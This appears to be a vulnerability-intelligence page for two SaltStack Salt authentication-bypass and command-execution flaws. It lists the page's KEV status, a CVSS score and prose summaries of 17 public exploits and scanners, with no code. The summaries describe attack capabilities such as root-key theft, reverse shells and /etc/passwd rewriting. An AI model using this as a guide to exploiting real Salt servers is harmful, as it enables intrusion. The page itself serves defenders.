Exploitation Summary
CVE-2020-11651 is actively exploited and listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, added November 3, 2021.
EIP tracks 17 public exploits from researchers including jasperla, rossengeorgiev, dozernz, including a Metasploit module auxiliary/gather/saltstack_salt_root_key.
AI-analyzed exploit summary This is a functional proof-of-concept exploit for CVE-2020-11651 and CVE-2020-11652, targeting SaltStack's authentication bypass and arbitrary command execution vulnerabilities. It demonstrates filesystem access, command scheduling on master/minions, and file upload capabilities.
Description
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
Exploits (17)
This is a functional proof-of-concept exploit for CVE-2020-11651 and CVE-2020-11652, targeting SaltStack's authentication bypass and arbitrary command execution vulnerabilities. It demonstrates filesystem access, command scheduling on master/minions, and file upload capabilities.
This repository provides a Python script to check if a SaltStack master is vulnerable to CVE-2020-11651 and CVE-2020-11652. It includes patches for unsupported Salt versions and a scanner to verify vulnerability status.
This PoC exploits CVE-2020-11651, an authentication bypass vulnerability in SaltStack, to achieve pre-auth RCE on the master node and/or associated minions. It retrieves the root key and executes arbitrary commands via the SaltStack transport mechanism.
This PoC exploits CVE-2020-11651, an authentication bypass in SaltStack Salt's ClearFuncs class, allowing unauthenticated remote command execution on the salt-master and minions. It includes functionality to fetch the root key, execute commands, and transfer files.
This is a functional exploit for CVE-2020-11651, an authentication bypass vulnerability in SaltStack. It allows unauthenticated access to the Salt master's root key and subsequent remote command execution or file reading.
This repository contains a compliance profile to check for vulnerable versions of SaltStack affected by CVE-2020-11651 and CVE-2020-11652. It verifies package versions and command-line output to ensure systems are patched or not installed.
This PoC exploits CVE-2020-11651, an authentication bypass vulnerability in SaltStack Salt, allowing unauthenticated remote command execution, file reads, and writes on the Salt Master. It uses ZeroMQ and MessagePack to craft malicious payloads targeting the Salt Master's publish interface.
This repository contains a Python-based exploit for CVE-2020-11651 and CVE-2020-11652, targeting SaltStack's authentication bypass and directory traversal vulnerabilities. It includes functionality for remote command execution, file read/write operations, and a reverse shell payload.
This repository contains a functional exploit for CVE-2020-11651 and CVE-2020-11652, targeting SaltStack's authentication bypass and directory traversal vulnerabilities. It includes features for remote command execution, file read/write, and reverse shell establishment.
This is a functional exploit for CVE-2020-11651 and CVE-2020-11652, targeting SaltStack's authentication bypass and remote code execution vulnerabilities. It allows adding a new user or replacing the root user by modifying /etc/passwd and /etc/shadow files.
This repository contains a scanning tool for detecting SaltStack vulnerabilities CVE-2020-11651 and CVE-2020-11652, which allow unauthenticated remote code execution and token disclosure. The tool includes methods for token disclosure and out-of-band DNS-based command injection detection.
This is a functional exploit for CVE-2020-11651 and CVE-2020-11652, targeting SaltStack's authentication bypass and remote code execution vulnerabilities. It includes methods to check for vulnerabilities, read/write files, and execute commands on the target system.
This is a functional exploit for CVE-2020-11651, targeting SaltStack's authentication bypass and arbitrary command execution vulnerabilities. It includes capabilities to retrieve the root key, execute commands on minions, and read/write files on the master.
This Metasploit module exploits an unauthenticated access vulnerability in SaltStack Salt master's ZeroMQ request server to disclose the root key used for authenticating administrative commands. It leverages the _prep_auth_info() method to extract the root key from serialized authentication data.
This repository contains a functional exploit for CVE-2020-11651 and CVE-2020-11652, targeting SaltStack's authentication bypass and arbitrary file read/write vulnerabilities. The PoC includes methods for remote code execution, file operations, and shell acquisition.
This repository contains a functional exploit for CVE-2020-11652, targeting SaltStack's authentication bypass and directory traversal vulnerability. The Go-based PoC interacts with the SaltStack master's ZeroMQ interface to extract the root key and read arbitrary files (e.g., /etc/passwd).
This exploit demonstrates an authentication bypass and remote code execution vulnerability in Saltstack versions prior to 3000.2, 2019.2.4, and 2017/2018 releases. It leverages CVE-2020-11651 and CVE-2020-11652 to read files, write files, and execute commands on the target system.
References (12)
Scores
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H